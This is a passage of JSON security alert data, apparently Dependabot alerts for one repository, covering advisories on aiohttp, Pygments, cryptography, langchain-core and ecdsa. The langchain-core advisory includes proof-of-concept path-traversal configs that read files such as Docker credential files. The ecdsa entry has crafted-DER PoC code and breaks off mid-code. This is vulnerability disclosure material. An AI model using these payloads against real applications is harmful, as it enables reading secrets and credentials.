3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/111","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/111","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":110,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3wq7-rqq7-wx6j","cve_id":"CVE-2026-34517","summary":"AIOHTTP has late size enforcement for non-file multipart fields causes memory DoS","description":"### Summary\n\nFor some multipart form fields, aiohttp read the entire field into memory before checking client_max_size.\n\n### Impact\n\nIf an application uses `Request.post()` an attacker can send a specially crafted multipart request to force significant temporary memory allocation even when the request is ultimately rejected.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145","severity":"low","identifiers":[{"value":"GHSA-3wq7-rqq7-wx6j","type":"GHSA"},{"value":"CVE-2026-34517","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-3wq7-rqq7-wx6j"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34517"},{"url":"https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-3wq7-rqq7-wx6j"}],"published_at":"2026-04-01T21:47:07Z","updated_at":"2026-04-01T21:47:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17179},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/110","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/110","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":109,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-m5qp-6w8w-w647","cve_id":"CVE-2026-34516","summary":"AIOHTTP has a Multipart Header Size Bypass","description":"### Summary\n\nA response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability.\n\n### Impact\n\nMultipart headers were not subject to the same size restrictions in place for normal headers, potentially allowing substantially more data to be loaded into memory than intended. 
However, other restrictions in place limit the impact of this vulnerability.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f","severity":"medium","identifiers":[{"value":"GHSA-m5qp-6w8w-w647","type":"GHSA"},{"value":"CVE-2026-34516","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34516"},{"url":"https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-m5qp-6w8w-w647"}],"published_at":"2026-04-01T21:43:07Z","updated_at":"2026-04-06T23:12:07Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/109","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/109","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":108,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-p998-jp59-783m","cve_id":"CVE-2026-34515","summary":"AIOHTTP affected by UNC SSRF/NTLMv2 Credential Theft/Local File Read in static resource handler on Windows","description":"### Summary\n\nOn Windows the static resource handler may expose information about a NTLMv2 remote path.\n\n### Impact\n\nIf an application is running on Windows, and using aiohttp's static resource handler (not recommended in production), then it may be possible for an attacker to extract the hash from an NTLMv2 path and then extract the user's credentials from there.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d","severity":"medium","identifiers":[{"value":"GHSA-p998-jp59-783m","type":"GHSA"},{"value":"CVE-2026-34515","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m"},{"url":"https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34515"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-p998-jp59-783m"}],"published_at":"2026-04-01T21:26:36Z","updated_at":"2026-04-06T16:47:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00066,"percentile":0.20264},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path Traversal"},{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/108","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/108","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":107,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2vrm-gr82-f7m5","cve_id":"CVE-2026-34514","summary":"AIOHTTP has CRLF injection through multipart part content type header construction","description":"### Summary\n\nAn attacker who controls the `content_type` parameter in aiohttp could use this to inject extra headers or similar exploits.\n\n### Impact\n\nIf an application allows untrusted data to be used for the multipart `content_type` parameter when constructing a request, an attacker may be able to manipulate the request to send something other than what the developer intended.\n\n-----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06","severity":"low","identifiers":[{"value":"GHSA-2vrm-gr82-f7m5","type":"GHSA"},{"value":"CVE-2026-34514","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5"},{"url":"https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34514"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-2vrm-gr82-f7m5"}],"published_at":"2026-04-01T21:20:06Z","updated_at":"2026-04-06T16:46:52Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/107","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/107","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":106,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-hcc4-c3v8-rx92","cve_id":"CVE-2026-34513","summary":"AIOHTTP Affected by Denial of Service (DoS) via Unbounded DNS Cache in TCPConnector","description":"### Summary\n\nAn unbounded DNS cache could result in excessive memory usage possibly resulting in a DoS situation.\n\n### Impact\n\nIf an application makes requests to a very large number of hosts, this could cause the DNS cache to continue growing and slowly use excessive amounts of memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98","severity":"low","identifiers":[{"value":"GHSA-hcc4-c3v8-rx92","type":"GHSA"},{"value":"CVE-2026-34513","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hcc4-c3v8-rx92"},{"url":"https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34513"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-hcc4-c3v8-rx92"}],"published_at":"2026-04-01T21:19:22Z","updated_at":"2026-04-06T16:46:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/106","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/106","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":105,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-w2fm-2cpv-w7v5","cve_id":"CVE-2026-22815","summary":"aiohttp allows unlimited trailer headers, leading to possible uncapped memory usage","description":"### Summary\n\nInsufficient restrictions in header/trailer handling could cause uncapped memory usage.\n\n### Impact\n\nAn application could cause memory exhaustion when receiving an attacker controlled request or response. 
A vulnerable web application could mitigate these risks with a typical reverse proxy configuration.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36","severity":"medium","identifiers":[{"value":"GHSA-w2fm-2cpv-w7v5","type":"GHSA"},{"value":"CVE-2026-22815","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5"},{"url":"https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22815"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-w2fm-2cpv-w7v5"}],"published_at":"2026-04-01T19:45:17Z","updated_at":"2026-04-06T16:46:37Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":6.9}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/105","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/105","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":104,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"Pygments"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-5239-wwwm-4pmq","cve_id":"CVE-2026-4539","summary":"Pygments has Regular Expression Denial of Service (ReDoS) due to Inefficient Regex for GUID Matching","description":"A security flaw has been discovered in pygments before 2.20.0. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. 
The project was informed of the problem early through an issue report but has not responded yet.","severity":"low","identifiers":[{"value":"GHSA-5239-wwwm-4pmq","type":"GHSA"},{"value":"CVE-2026-4539","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-4539"},{"url":"https://github.com/pygments/pygments/issues/3058"},{"url":"https://github.com/pygments/pygments"},{"url":"https://vuldb.com/?ctiid.352327"},{"url":"https://vuldb.com/?id.352327"},{"url":"https://vuldb.com/?submit.774685"},{"url":"https://github.com/pygments/pygments/pull/3064"},{"url":"https://github.com/pygments/pygments/commit/24b8aa76c6cd6d70f39c6dd605cce319c98e2ccc"},{"url":"https://github.com/pygments/pygments/releases/tag/2.20.0"},{"url":"https://github.com/advisories/GHSA-5239-wwwm-4pmq"}],"published_at":"2026-03-22T06:30:15Z","updated_at":"2026-03-30T14:40:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 2.20.0","first_patched_version":{"identifier":"2.20.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P","score":1.9}},"epss":{"percentage":7.0e-05,"percentile":0.00646},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-1333","name":"Inefficient Regular Expression Complexity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 
2.20.0","first_patched_version":{"identifier":"2.20.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/104","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/104","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":103,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-m959-cc7f-wv43","cve_id":"CVE-2026-34073","summary":"cryptography has incomplete DNS name constraint enforcement on peer names","description":"## Summary\n\nIn versions of cryptography prior to 46.0.5, DNS name constraints were only validated against SANs within child certificates, and not the \"peer name\" presented during each validation. Consequently, cryptography would allow a peer named `bar.example.com` to validate against a wildcard leaf certificate for `*.example.com`, even if the leaf's parent certificate (or upwards) contained an excluded subtree constraint for `bar.example.com`.\n\nThis behavior resulted from a gap between RFC 5280 (which defines Name Constraint semantics) and RFC 9525 (which defines service identity semantics): put together, neither states definitively whether Name Constraints should be applied to peer names. To close this gap, cryptography now conservatively rejects any validation where the peer name would be rejected by a name constraint if it were a SAN instead.\n\nIn practice, exploitation of this bypass requires an uncommon X.509 topology, one that the Web PKI avoids because it exhibits these kinds of problems. 
Consequently, we consider this a medium-to-low impact severity.\n\nSee CVE-2025-61727 for a similar bypass in Go's `crypto/x509`.\n\n## Remediation\n\nUsers should upgrade to 46.0.6 or newer. \n\n## Attribution\n\nReporter: @1seal","severity":"low","identifiers":[{"value":"GHSA-m959-cc7f-wv43","type":"GHSA"},{"value":"CVE-2026-34073","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-m959-cc7f-wv43"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34073"},{"url":"https://github.com/advisories/GHSA-m959-cc7f-wv43"}],"published_at":"2026-03-27T19:56:21Z","updated_at":"2026-04-06T23:13:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 46.0.6","first_patched_version":{"identifier":"46.0.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":1.7}},"epss":{"percentage":9.0e-05,"percentile":0.0084},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-295","name":"Improper Certificate Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 
46.0.6","first_patched_version":{"identifier":"46.0.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/103","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/103","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":102,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-qh6h-p6c9-ff54","cve_id":"CVE-2026-34070","summary":"LangChain Core has Path Traversal vulnerabilites in legacy `load_prompt` functions","description":"## Summary\n\nMultiple functions in `langchain_core.prompts.loading` read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to `load_prompt()` or `load_prompt_from_config()`, an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (`.txt` for templates, `.json`/`.yaml` for examples).\n\n**Note:** The affected functions (`load_prompt`, `load_prompt_from_config`, and the `.save()` method on prompt classes) are undocumented legacy APIs. They are superseded by the `dumpd`/`dumps`/`load`/`loads` serialization APIs in `langchain_core.load`, which do not perform filesystem reads and use an allowlist-based security model. 
As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.\n\n## Affected component\n\n**Package:** `langchain-core`\n**File:** `langchain_core/prompts/loading.py`\n**Affected functions:** `_load_template()`, `_load_examples()`, `_load_few_shot_prompt()`\n\n## Severity\n\n**High** \n\nThe score reflects the file-extension constraints that limit which files can be read.\n\n## Vulnerable code paths\n\n| Config key | Loaded by | Readable extensions |\n|---|---|---|\n| `template_path`, `suffix_path`, `prefix_path` | `_load_template()` | `.txt` |\n| `examples` (when string) | `_load_examples()` | `.json`, `.yaml`, `.yml` |\n| `example_prompt_path` | `_load_few_shot_prompt()` | `.json`, `.yaml`, `.yml` |\n\nNone of these code paths validated the supplied path against absolute path injection or `..` traversal sequences before reading from disk.\n\n## Impact\n\nAn attacker who controls or influences the prompt configuration dict can read files outside the intended directory:\n\n- **`.txt` files:** cloud-mounted secrets (`/mnt/secrets/api_key.txt`), `requirements.txt`, internal system prompts\n- **`.json`/`.yaml` files:** cloud credentials (`~/.docker/config.json`, `~/.azure/accessTokens.json`), Kubernetes manifests, CI/CD configs, application settings\n\nThis is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose `load_prompt_from_config()`.\n\n## Proof of concept\n\n```python\nfrom langchain_core.prompts.loading import load_prompt_from_config\n\n# Reads /tmp/secret.txt via absolute path injection\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"/tmp/secret.txt\",\n \"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\nprint(prompt.template) # file contents disclosed\n\n# Reads ../../etc/secret.txt via directory traversal\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"../../etc/secret.txt\",\n 
\"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\n\n# Reads arbitrary .json via few-shot examples\nconfig = {\n \"_type\": \"few_shot\",\n \"examples\": \"../../../../.docker/config.json\",\n \"example_prompt\": {\n \"_type\": \"prompt\",\n \"input_variables\": [\"input\", \"output\"],\n \"template\": \"{input}: {output}\",\n },\n \"prefix\": \"\",\n \"suffix\": \"{query}\",\n \"input_variables\": [\"query\"],\n}\nprompt = load_prompt_from_config(config)\n```\n\n## Mitigation\n\n**Update `langchain-core` to >= 1.2.22.**\n\nThe fix adds path validation that rejects absolute paths and `..` traversal sequences by default. An `allow_dangerous_paths=True` keyword argument is available on `load_prompt()` and `load_prompt_from_config()` for trusted inputs.\n\nAs described above, these legacy APIs have been formally deprecated. Users should migrate to `dumpd`/`dumps`/`load`/`loads` from `langchain_core.load`.\n\n## Credit\n\n- [jiayuqi7813](https://github.com/jiayuqi7813) reporter\n- [VladimirEliTokarev](https://github.com/VladimirEliTokarev) reporter\n- [Rickidevs](https://github.com/Rickidevs) reporter\n- Kenneth Cox (cczine@gmail.com) reporter","severity":"high","identifiers":[{"value":"GHSA-qh6h-p6c9-ff54","type":"GHSA"},{"value":"CVE-2026-34070","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-qh6h-p6c9-ff54"},{"url":"https://github.com/langchain-ai/langchain/commit/27add913474e01e33bededf4096151130ba0d47c"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core==1.2.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34070"},{"url":"https://github.com/advisories/GHSA-qh6h-p6c9-ff54"}],"published_at":"2026-03-27T19:45:00Z","updated_at":"2026-03-31T18:41:15Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 
1.2.22","first_patched_version":{"identifier":"1.2.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00035,"percentile":0.10523},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 1.2.22","first_patched_version":{"identifier":"1.2.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/102","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/102","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":101,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-9f5j-8jwj-x28g","cve_id":"CVE-2026-33936","summary":"python-ecdsa: Denial of Service via improper DER length validation in crafted private keys","description":"## Summary\n\nAn issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions.\n\n1. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected.\n\n2. 
Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service.\n\n## Impact\n\nPotential denial-of-service when parsing untrusted DER private keys due to unexpected internal exceptions, and malformed DER acceptance due to missing bounds checks in DER helper functions.\n\n## Reproduction\n\nAttach and run the following PoCs:\n\n### poc_truncated_der_octet.py\n\n```python\nfrom ecdsa.der import remove_octet_string, UnexpectedDER\n\n# OCTET STRING (0x04)\n# Declared length: 0x82 0x10 0x00 -> 4096 bytes\n# Actual body: only 3 bytes -> truncated DER\nbad = b\"\\x04\\x82\\x10\\x00\" + b\"ABC\"\n\ntry:\n body, rest = remove_octet_string(bad)\n print(\"[BUG] remove_octet_string accepted truncated DER.\")\n print(\"Declared length=4096, actual body_len=\", len(body), \"rest_len=\", len(rest))\n print(\"Body=\", body)\n print(\"Rest=\", rest)\nexcept UnexpectedDER as e:\n print(\"[OK] Rejected malformed DER:\", e)\n```\n\n- Expected: reject malformed DER when declared length exceeds available bytes\n- Actual: accepts the truncated DER and returns a shorter body\n- Example output:\n```\nParsed body_len= 3 rest_len= 0 (while declared length is 4096)\n```\n\n### poc_signingkey_from_der_indexerror.py\n\n```python\nfrom ecdsa import SigningKey, NIST256p\nimport ecdsa\n\nprint(\"ecdsa version:\", ecdsa.__version__)\n\nsk = SigningKey.generate(curve=NIST256p)\ngood = sk.to_der()\nprint(\"Good DER len:\", len(good))\n\n\ndef find_crashing_mutation(data: bytes):\n b = bytearray(data)\n\n # Try every OCTET STRING tag position and corrupt a short-form length byte\n for i in range(len(b) - 4):\n if b[i] != 0x04: # OCTET STRING 